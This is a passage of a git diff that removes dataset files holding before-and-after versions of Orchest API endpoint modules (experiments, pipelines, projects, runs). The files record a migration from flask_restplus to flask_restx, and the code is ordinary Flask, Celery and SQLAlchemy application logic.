task_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(image_mappings) - db.session.commit() - - if len(experiment_creation_error_messages) == 0: - # prepare the args for the task - run_config = pipeline_run_spec["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "experiment_uuid": post_data["experiment_uuid"], - "project_uuid": post_data["project_uuid"], - "pipeline_definition": pipeline.to_dict(), - "run_config": run_config, - } - - # Due to circular imports we use the task name instead of - # importing the function directly. - tasks_to_launch.append( - { - "name": "app.core.tasks.start_non_interactive_pipeline_run", - "eta": scheduled_start, - "kwargs": celery_job_kwargs, - "task_id": task_id, - } - ) - - experiment["pipeline_runs"] = pipeline_runs - - if len(experiment_creation_error_messages) == 0: - # Create Celery object with the Flask context - celery = make_celery(current_app) - for task in tasks_to_launch: - res = celery.send_task(**task) - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - - return experiment, 201 - else: - logging.error("\n".join(experiment_creation_error_messages)) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - for pipeline_run in experiment["pipeline_runs"]: - pipeline_run.status = "SUCCESS" - for step in pipeline_run["pipeline_steps"]: - step.status = "FAILURE" - - models.PipelineRunStep.query.filter_by( - run_uuid=pipeline_run["run_uuid"] - ).update({"status": "FAILURE"}) - - models.NonInteractivePipelineRun.query.filter_by( - experiment_uuid=post_data["experiment_uuid"] - ).update({"status": "SUCCESS"}) - db.session.commit() - - return { - "message": "Failed to create experiment because not all referenced environments are available." - }, 500 - - -@api.route("/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class Experiment(Resource): - @api.doc("get_experiment") - @api.marshal_with(schema.experiment, code=200) - def get(self, experiment_uuid): - """Fetches an experiment given its UUID.""" - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - return experiment.__dict__ - - # TODO: We should also make it possible to stop a particular pipeline - # run of an experiment. It should state "cancel" the execution - # of a pipeline run, since we do not do termination of running - # tasks. - @api.doc("delete_experiment") - @api.response(200, "Experiment terminated") - def delete(self, experiment_uuid): - """Stops an experiment given its UUID. - - However, it will not delete any corresponding database entries, - it will update the status of corresponding objects to "REVOKED". - """ - if stop_experiment(experiment_uuid): - return {"message": "Experiment termination was successful"}, 200 - else: - return ( - { - "message": "Experiment does not \ - exist or is already completed" - }, - 404, - ) - - -@api.route( - "//", - doc={ - "description": ( - "Set and get execution status of pipeline runs " "in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Pipeline run not found") -class PipelineRun(Resource): - @api.doc("get_pipeline_run") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid): - """Fetch a pipeline run of an experiment given their ids.""" - non_interactive_run = models.NonInteractivePipelineRun.query.filter_by( - run_uuid=run_uuid, - ).one_or_none() - if non_interactive_run is None: - abort(404, "Given experiment has no run with given run_uuid") - return non_interactive_run.__dict__ - - @api.doc("set_pipeline_run_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid): - """Set the status of a pipeline run.""" - status_update = request.get_json() - - # The pipeline run has reached a final state, thus we can update - # the experiment "completed_pipeline_runs" attribute. - if status_update["status"] in ["SUCCESS", "FAILURE"]: - experiment = models.Experiment.query.get_or_404( - experiment_uuid, - description="Experiment not found", - ) - experiment.completed_pipeline_runs += 1 - db.session.commit() - - filter_by = { - "experiment_uuid": experiment_uuid, - "run_uuid": run_uuid, - } - update_status_db( - status_update, model=models.NonInteractivePipelineRun, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route( - "///", - doc={ - "description": ( - "Set and get execution status of individual steps of " - "pipeline runs in an experiment." - ) - }, -) -@api.param("experiment_uuid", "UUID of Experiment") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Step") -@api.response(404, "Pipeline step not found") -class PipelineStepStatus(Resource): - @api.doc("get_pipeline_run_pipeline_step") - @api.marshal_with(schema.non_interactive_run, code=200) - def get(self, experiment_uuid, run_uuid, step_uuid): - """Fetch a pipeline step of a run of an experiment given uuids.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Combination of given experiment, run and step not found", - ) - return step.__dict__ - - @api.doc("set_pipeline_run_pipeline_step_status") - @api.expect(schema.status_update) - def put(self, experiment_uuid, run_uuid, step_uuid): - """Set the status of a pipeline step of a pipeline run.""" - status_update = request.get_json() - - filter_by = { - "run_uuid": run_uuid, - "step_uuid": step_uuid, - } - update_status_db( - status_update, - model=models.PipelineRunStep, - filter_by=filter_by, - ) - - return {"message": "Status was updated successfully"}, 200 - - -@api.route("/cleanup/") -@api.param("experiment_uuid", "UUID of experiment") -@api.response(404, "Experiment not found") -class ExperimentDeletion(Resource): - @api.doc("delete_experiment") - @api.response(200, "Experiment deleted") - def delete(self, experiment_uuid): - """Delete an experiment. - - The experiment is stopped if its running, related entities - are then removed from the db. - """ - if delete_experiment(experiment_uuid): - return {"message": "Experiment deletion was successful"}, 200 - else: - return {"message": "Experiment does not exist"}, 404 - - -def stop_experiment(experiment_uuid) -> bool: - """Stop an experiment. - - Args: - experiment_uuid: - - Returns: - True if the experiment exists and was stopped, false - if it did not exist or if it was already completed. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - run_uuids = [ - run.run_uuid - for run in experiment.pipeline_runs - if run.status in ["PENDING", "STARTED"] - ] - if len(run_uuids) == 0: - return False - - # Aborts and revokes all pipeline runs and waits for a - # reply for 1.0s. - celery = make_celery(current_app) - celery.control.revoke(run_uuids, timeout=1.0) - - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the task - # will try to set the status as well - for run_uuid in run_uuids: - res = AbortableAsyncResult(run_uuid, app=celery) - # it is responsibility of the task to terminate by reading \ - # it's aborted status - res.abort() - - # Update the status of the run and step entries to "REVOKED". - models.NonInteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - models.PipelineRunStep.query.filter_by(run_uuid=run_uuid).update( - {"status": "REVOKED"} - ) - - db.session.commit() - return True - - -def delete_experiment(experiment_uuid) -> bool: - """Delete an experiment. - - If running, the experiment is aborted. All data related - to the experiment is removed. - - Args: - experiment_uuid: - - Returns: - True if the experiment existed and was removed, false - otherwise. - """ - experiment = models.Experiment.query.filter_by( - experiment_uuid=experiment_uuid - ).one_or_none() - if experiment is None: - return False - - stop_experiment(experiment_uuid) - # non interactive runs -> non interactive run image mapping - # non interactive runs step - db.session.delete(experiment) - db.session.commit() - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff deleted file mode 100644 index e3f1d35..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_pipelines.py b/services/orchest-api/app/app/apis/namespace_pipelines.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_pipelines.py - +++ b/services/orchest-api/app/app/apis/namespace_pipelines.py -@@ -1,9 +1,9 @@ - """API endpoint to manage pipelines. - --Despite the fact that the orchest api has no model related to a -+Despite the fact that the orchest api has no model related to a - pipeline, a good amount of other models depend on such a concept. - """ --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app.apis.namespace_runs import stop_pipeline_run diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py deleted file mode 100644 index d26acba..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.source.py +++ /dev/null @@ -1,62 +0,0 @@ -"""API endpoint to manage pipelines. - -Despite the fact that the orchest api has no model related to a -pipeline, a good amount of other models depend on such a concept. -""" -from flask_restplus import Namespace, Resource - -import app.models as models -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("pipelines", description="Managing pipelines") -api = register_schema(api) - - -@api.route("//") -@api.param("project_uuid", "UUID of the project") -@api.param("pipeline_uuid", "UUID of the pipeline") -class Pipeline(Resource): - @api.doc("delete_pipeline") - @api.response(200, "Pipeline cleaned up") - def delete(self, project_uuid, pipeline_uuid): - """Delete a pipeline. - - Any session, run, experiment related to the pipeline is stopped - and removed from the db. - """ - delete_pipeline(project_uuid, pipeline_uuid) - return {"message": "Pipeline deletion was successful"}, 200 - - -def delete_pipeline(project_uuid, pipeline_uuid): - """Delete a pipeline and all related entities. - - - Any session or run related to the pipeline is stopped - and removed from the db. - - Args: - project_uuid: - pipeline_uuid: - """ - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any session if it exists - stop_interactive_session(project_uuid, pipeline_uuid) - - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py deleted file mode 100644 index 85eccf5..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_pipelines.py.target.py +++ /dev/null @@ -1,62 +0,0 @@ -"""API endpoint to manage pipelines. - -Despite the fact that the orchest api has no model related to a -pipeline, a good amount of other models depend on such a concept. -""" -from flask_restx import Namespace, Resource - -import app.models as models -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("pipelines", description="Managing pipelines") -api = register_schema(api) - - -@api.route("//") -@api.param("project_uuid", "UUID of the project") -@api.param("pipeline_uuid", "UUID of the pipeline") -class Pipeline(Resource): - @api.doc("delete_pipeline") - @api.response(200, "Pipeline cleaned up") - def delete(self, project_uuid, pipeline_uuid): - """Delete a pipeline. - - Any session, run, experiment related to the pipeline is stopped - and removed from the db. - """ - delete_pipeline(project_uuid, pipeline_uuid) - return {"message": "Pipeline deletion was successful"}, 200 - - -def delete_pipeline(project_uuid, pipeline_uuid): - """Delete a pipeline and all related entities. - - - Any session or run related to the pipeline is stopped - and removed from the db. - - Args: - project_uuid: - pipeline_uuid: - """ - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid, pipeline_uuid=pipeline_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any session if it exists - stop_interactive_session(project_uuid, pipeline_uuid) - - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff deleted file mode 100644 index 07de8a0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_projects.py b/services/orchest-api/app/app/apis/namespace_projects.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_projects.py - +++ b/services/orchest-api/app/app/apis/namespace_projects.py -@@ -1,9 +1,9 @@ - """API endpoint to manage projects. - --Despite the fact that the orchest api has no model related to a -+Despite the fact that the orchest api has no model related to a - project, a good amount of other models depend on such a concept. - """ --from flask_restplus import Namespace, Resource -+from flask_restx import Namespace, Resource - - import app.models as models - from app.apis.namespace_environment_images import delete_project_environment_images diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py deleted file mode 100644 index 023f975..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.source.py +++ /dev/null @@ -1,89 +0,0 @@ -"""API endpoint to manage projects. - -Despite the fact that the orchest api has no model related to a -project, a good amount of other models depend on such a concept. -""" -from flask_restplus import Namespace, Resource - -import app.models as models -from app.apis.namespace_environment_images import delete_project_environment_images -from app.apis.namespace_experiments import delete_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("projects", description="Managing Projects") -api = register_schema(api) - - -@api.route("/") -@api.param("project_uuid", "UUID of the project") -class Project(Resource): - @api.doc("delete_project") - @api.response(200, "Project deleted") - def delete(self, project_uuid): - """Delete a project. - - Any session, run, experiment related to the project is stopped - and removed from the db. Environment images are removed. - """ - delete_project(project_uuid) - return {"message": "Project deletion was successful"}, 200 - - -def delete_project(project_uuid): - """Delete a project and all related entities. - - Project sessions, runs and experiments are stopped. Every - related entity in the db is removed. Environment images are - deleted up. - - Args: - project_uuid: - """ - - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any running session - sessions = ( - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities( - models.InteractiveSession.project_uuid, - models.InteractiveSession.pipeline_uuid, - ) - .distinct() - .all() - ) - for session in sessions: - # stop and delete any session if it exists - stop_interactive_session(session.project_uuid, session.pipeline_uuid) - - # any experiment related to the pipeline is stopped if necessary, - # then deleted - experiments = ( - models.Experiment.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities(models.Experiment.experiment_uuid) - .all() - ) - for experiment in experiments: - delete_experiment(experiment.experiment_uuid) - - # delete images (will also take care of builds and dangling images) - delete_project_environment_images(project_uuid) - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py deleted file mode 100644 index 80a0927..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_projects.py.target.py +++ /dev/null @@ -1,89 +0,0 @@ -"""API endpoint to manage projects. - -Despite the fact that the orchest api has no model related to a -project, a good amount of other models depend on such a concept. -""" -from flask_restx import Namespace, Resource - -import app.models as models -from app.apis.namespace_environment_images import delete_project_environment_images -from app.apis.namespace_experiments import delete_experiment -from app.apis.namespace_runs import stop_pipeline_run -from app.apis.namespace_sessions import stop_interactive_session -from app.connections import db -from app.utils import register_schema - -api = Namespace("projects", description="Managing Projects") -api = register_schema(api) - - -@api.route("/") -@api.param("project_uuid", "UUID of the project") -class Project(Resource): - @api.doc("delete_project") - @api.response(200, "Project deleted") - def delete(self, project_uuid): - """Delete a project. - - Any session, run, experiment related to the project is stopped - and removed from the db. Environment images are removed. - """ - delete_project(project_uuid) - return {"message": "Project deletion was successful"}, 200 - - -def delete_project(project_uuid): - """Delete a project and all related entities. - - Project sessions, runs and experiments are stopped. Every - related entity in the db is removed. Environment images are - deleted up. - - Args: - project_uuid: - """ - - # any interactive run related to the pipeline is stopped - # if necessary, then deleted - interactive_runs = models.InteractivePipelineRun.query.filter_by( - project_uuid=project_uuid - ).all() - for run in interactive_runs: - if run.status in ["PENDING", "STARTED"]: - stop_pipeline_run(run.run_uuid) - # will delete cascade - # interactive run pipeline step - # interactive run image mapping - db.session.delete(run) - - # stop and delete any running session - sessions = ( - models.InteractiveSession.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities( - models.InteractiveSession.project_uuid, - models.InteractiveSession.pipeline_uuid, - ) - .distinct() - .all() - ) - for session in sessions: - # stop and delete any session if it exists - stop_interactive_session(session.project_uuid, session.pipeline_uuid) - - # any experiment related to the pipeline is stopped if necessary, - # then deleted - experiments = ( - models.Experiment.query.filter_by( - project_uuid=project_uuid, - ) - .with_entities(models.Experiment.experiment_uuid) - .all() - ) - for experiment in experiments: - delete_experiment(experiment.experiment_uuid) - - # delete images (will also take care of builds and dangling images) - delete_project_environment_images(project_uuid) - db.session.commit() diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff deleted file mode 100644 index 5fb576e..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/apis/namespace_runs.py b/services/orchest-api/app/app/apis/namespace_runs.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/apis/namespace_runs.py - +++ b/services/orchest-api/app/app/apis/namespace_runs.py -@@ -8,7 +8,7 @@ import uuid - from celery.contrib.abortable import AbortableAsyncResult - from docker import errors - from flask import abort, current_app, request --from flask_restplus import Namespace, Resource, marshal -+from flask_restx import Namespace, Resource, marshal - - import app.models as models - from app import schema diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py deleted file mode 100644 index 30ac2a0..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.source.py +++ /dev/null @@ -1,259 +0,0 @@ -"""API endpoint to manage runs. - -Note: "run" is short for "interactive pipeline run". -""" -import logging -import uuid - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restplus import Namespace, Resource, marshal - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("runs", description="Manages interactive pipeline runs") -api = register_schema(api) - - -@api.route("/") -class RunList(Resource): - @api.doc("get_runs") - @api.marshal_with(schema.interactive_runs) - def get(self): - """Fetches all (interactive) pipeline runs. - - These pipeline runs are either pending, running or have already - completed. - """ - - query = models.InteractivePipelineRun.query - - # Ability to query a specific runs given the `pipeline_uuid` or `project_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - runs = query.all() - return {"runs": [run.__dict__ for run in runs]}, 200 - - @api.doc("start_run") - @api.expect(schema.interactive_run_spec) - def post(self): - """Starts a new (interactive) pipeline run.""" - post_data = request.get_json() - post_data["run_config"]["run_endpoint"] = "runs" - - pipeline = construct_pipeline(**post_data) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - # NOTE: we are setting the status of the run ourselves without - # using the option of celery to get the status of tasks. This - # way we do not have to configure a backend (where the default - # of "rpc://" does not give the results we would want). - run = { - "run_uuid": task_id, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.InteractivePipelineRun(**run)) - # need to flush because otherwise the bulk insertion of pipeline - # steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # Set an initial value for the status of the pipeline steps that - # will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{"run_uuid": task_id, "step_uuid": step_uuid, "status": "PENDING"} - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - run["pipeline_steps"] = pipeline_steps - - # get docker ids of images to use and make it so that the images - # will not be deleted in case they become outdated by an - # environment rebuild - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - logging.error( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - # TODO: make it so that the client does not rely - # on SUCCESS as a status - run["status"] = "SUCCESS" - for step in run["pipeline_steps"]: - step.status = "FAILURE" - models.InteractivePipelineRun.query.filter_by(run_uuid=task_id).update( - {"status": "SUCCESS"} - ) - models.PipelineRunStep.query.filter_by(run_uuid=task_id).update( - {"status": "FAILURE"} - ) - db.session.commit() - - return { - "message": "Failed to start interactive run because not all referenced environments are available." - }, 500 - - # Create Celery object with the Flask context and construct the - # kwargs for the job. - celery = make_celery(current_app) - run_config = post_data["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "pipeline_definition": pipeline.to_dict(), - "project_uuid": post_data["project_uuid"], - "run_config": run_config, - } - - # Start the run as a background task on Celery. Due to circular - # imports we send the task by name instead of importing the - # function directly. - res = celery.send_task( - "app.core.tasks.run_pipeline", kwargs=celery_job_kwargs, task_id=task_id - ) - - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - return marshal(run, schema.interactive_run), 201 - - -@api.route("/") -@api.param("run_uuid", "UUID of Run") -@api.response(404, "Run not found") -class Run(Resource): - @api.doc("get_run") - @api.marshal_with(schema.interactive_run, code=200) - def get(self, run_uuid): - """Fetches an interactive pipeline run given its UUID.""" - run = models.InteractivePipelineRun.query.filter_by( - run_uuid=run_uuid - ).one_or_none() - if run is None: - abort(404, description="Run not found") - return run.__dict__ - - @api.doc("set_run_status") - @api.expect(schema.status_update) - def put(self, run_uuid): - """Sets the status of a pipeline run.""" - post_data = request.get_json() - - res = models.InteractivePipelineRun.query.filter_by(run_uuid=run_uuid).update( - {"status": post_data["status"]} - ) - - if res: - db.session.commit() - - return {"message": "Status was updated successfully"}, 200 - - @api.doc("delete_run") - @api.response(200, "Run terminated") - def delete(self, run_uuid): - """Stops a pipeline run given its UUID.""" - if stop_pipeline_run(run_uuid): - return {"message": "Run termination was successful"}, 200 - else: - return {"message": "Run does not exist or is not running"}, 400 - - -@api.route("//") -@api.param("run_uuid", "UUID of Run") -@api.param("step_uuid", "UUID of Pipeline Step") -@api.response(404, "Pipeline step not found") -class StepStatus(Resource): - @api.doc("get_step_status") - @api.marshal_with(schema.pipeline_run_pipeline_step, code=200) - def get(self, run_uuid, step_uuid): - """Fetches the status of a pipeline step of a specific run.""" - step = models.PipelineRunStep.query.get_or_404( - ident=(run_uuid, step_uuid), - description="Run and step combination not found", - ) - return step.__dict__ - - @api.doc("set_step_status") - @api.expect(schema.status_update) - def put(self, run_uuid, step_uuid): - """Sets the status of a pipeline step.""" - status_update = request.get_json() - - # TODO: first check the status and make sure it says PENDING or - # whatever. Because if is empty then this would write it - # and then get overwritten afterwards with "PENDING". - filter_by = {"run_uuid": run_uuid, "step_uuid": step_uuid} - update_status_db( - status_update, model=models.PipelineRunStep, filter_by=filter_by - ) - - return {"message": "Status was updated successfully"}, 200 - - -def stop_pipeline_run(run_uuid) -> bool: - """Stop a pipeline run. - - The run will cancelled if not running yet, otherwise - it will be aborted. - - Args: - run_uuid: - - Returns: - True if a cancellation was issued to the run, false if the - run did not exist or was not PENDING/STARTED. - """ - interactive_run = models.PipelineRun.query.filter( - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - models.PipelineRun.run_uuid == run_uuid, - ).one_or_none() - if interactive_run is None: - return False - - celery_app = make_celery(current_app) - res = AbortableAsyncResult(run_uuid, app=celery_app) - - # it is responsibility of the task to terminate by reading - # it's aborted status - res.abort() - - celery_app.control.revoke(run_uuid) - # TODO: possibly set status of steps and Run to "ABORTED" - # note that a race condition would be present since the - # task will try to set the status as well - - return True diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py deleted file mode 100644 index b08770d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$apis$namespace_runs.py.target.py +++ /dev/null @@ -1,259 +0,0 @@ -"""API endpoint to manage runs. - -Note: "run" is short for "interactive pipeline run". -""" -import logging -import uuid - -from celery.contrib.abortable import AbortableAsyncResult -from docker import errors -from flask import abort, current_app, request -from flask_restx import Namespace, Resource, marshal - -import app.models as models -from app import schema -from app.celery_app import make_celery -from app.connections import db -from app.core.pipelines import construct_pipeline -from app.utils import lock_environment_images_for_run, register_schema, update_status_db - -api = Namespace("runs", description="Manages interactive pipeline runs") -api = register_schema(api) - - -@api.route("/") -class RunList(Resource): - @api.doc("get_runs") - @api.marshal_with(schema.interactive_runs) - def get(self): - """Fetches all (interactive) pipeline runs. - - These pipeline runs are either pending, running or have already - completed. - """ - - query = models.InteractivePipelineRun.query - - # Ability to query a specific runs given the `pipeline_uuid` or `project_uuid` - # through the URL (using `request.args`). - if "pipeline_uuid" in request.args and "project_uuid" in request.args: - query = query.filter_by( - pipeline_uuid=request.args.get("pipeline_uuid") - ).filter_by(project_uuid=request.args.get("project_uuid")) - elif "project_uuid" in request.args: - query = query.filter_by(project_uuid=request.args.get("project_uuid")) - - runs = query.all() - return {"runs": [run.__dict__ for run in runs]}, 200 - - @api.doc("start_run") - @api.expect(schema.interactive_run_spec) - def post(self): - """Starts a new (interactive) pipeline run.""" - post_data = request.get_json() - post_data["run_config"]["run_endpoint"] = "runs" - - pipeline = construct_pipeline(**post_data) - - # specify the task_id beforehand to avoid race conditions - # between the task and its presence in the db - task_id = str(uuid.uuid4()) - - # NOTE: we are setting the status of the run ourselves without - # using the option of celery to get the status of tasks. This - # way we do not have to configure a backend (where the default - # of "rpc://" does not give the results we would want). - run = { - "run_uuid": task_id, - "pipeline_uuid": pipeline.properties["uuid"], - "project_uuid": post_data["project_uuid"], - "status": "PENDING", - } - db.session.add(models.InteractivePipelineRun(**run)) - # need to flush because otherwise the bulk insertion of pipeline - # steps will lead to foreign key errors - # https://docs.sqlalchemy.org/en/13/orm/persistence_techniques.html#bulk-operations-caveats - db.session.flush() - - # Set an initial value for the status of the pipeline steps that - # will be run. - step_uuids = [s.properties["uuid"] for s in pipeline.steps] - - pipeline_steps = [] - for step_uuid in step_uuids: - pipeline_steps.append( - models.PipelineRunStep( - **{"run_uuid": task_id, "step_uuid": step_uuid, "status": "PENDING"} - ) - ) - db.session.bulk_save_objects(pipeline_steps) - db.session.commit() - run["pipeline_steps"] = pipeline_steps - - # get docker ids of images to use and make it so that the images - # will not be deleted in case they become outdated by an - # environment rebuild - try: - env_uuid_docker_id_mappings = lock_environment_images_for_run( - task_id, - post_data["project_uuid"], - pipeline.get_environments(), - ) - except errors.ImageNotFound as e: - logging.error( - f"Pipeline was referencing environments for " - f"which an image does not exist, {e}" - ) - - # simple way to update both in memory objects - # and the db while avoiding multiple update statements - # (1 for each object) - # TODO: make it so that the client does not rely - # on SUCCESS as a status - run["status"] = "SUCCESS" - for step in run["pipeline_steps"]: - step.status = "FAILURE" - models.InteractivePipelineRun.query.filter_by(run_uuid=task_id).update( - {"status": "SUCCESS"} - ) - models.PipelineRunStep.query.filter_by(run_uuid=task_id).update( - {"status": "FAILURE"} - ) - db.session.commit() - - return { - "message": "Failed to start interactive run because not all referenced environments are available." - }, 500 - - # Create Celery object with the Flask context and construct the - # kwargs for the job. - celery = make_celery(current_app) - run_config = post_data["run_config"] - run_config["env_uuid_docker_id_mappings"] = env_uuid_docker_id_mappings - celery_job_kwargs = { - "pipeline_definition": pipeline.to_dict(), - "project_uuid": post_data["project_uuid"], - "run_config": run_config, - } - - # Start the run as a background task on Celery. Due to circular - # imports we send the task by name instead of importing the - # function directly. - res = celery.send_task( - "app.core.tasks.run_pipeline", kwargs=celery_job_kwargs, task_id=task_id - ) - - # NOTE: this is only if a backend is configured. The task does - # not return anything. Therefore we can forget its result and - # make sure that the Celery backend releases recourses (for - # storing and transmitting results) associated to the task. - # Uncomment the line below if applicable. - res.forget() - return marshal(run, schema.interactive_run), 201 - - -@api.route("/") -@api.param("run_uuid", "UUID of Run") 